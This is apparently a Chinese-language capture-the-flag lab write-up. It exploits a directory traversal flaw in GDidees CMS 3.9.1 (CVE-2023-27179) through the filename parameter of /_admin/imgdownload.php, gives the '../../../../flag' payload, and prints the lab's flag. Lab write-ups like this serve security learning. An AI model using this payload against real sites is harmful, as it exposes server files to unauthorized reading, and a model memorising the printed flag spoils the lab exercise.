靶标介绍:
GDidees CMS v3.9.1及更低版本被发现存在本地文件泄露漏洞,漏洞通过位于 /_admin/imgdownload.php 的 filename 参数进行利用。
访问实验地址
通过靶场介绍得知,漏洞通过位于 /_admin/imgdownload.php 的 filename 参数进行利用。构造访问目录。
http://eci-2zeh4jwpx8vpuxj3gjtn.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename=flag
发现可以下载文件,打开flag.png,发现没有flag
使用Burp工具抓包,重放。
构造目录穿越
_admin/imgdownload.php?filename=../../../../flag,点击go
得到flag:flag{f16d0fe0-7afb-49fb-b093-0bfc9ea91159}
参考文章:💀 GDidees CMS 3.9.1 本地文件泄漏/目录遍历漏洞利用 CVE-2023-27179 (sploitus.com)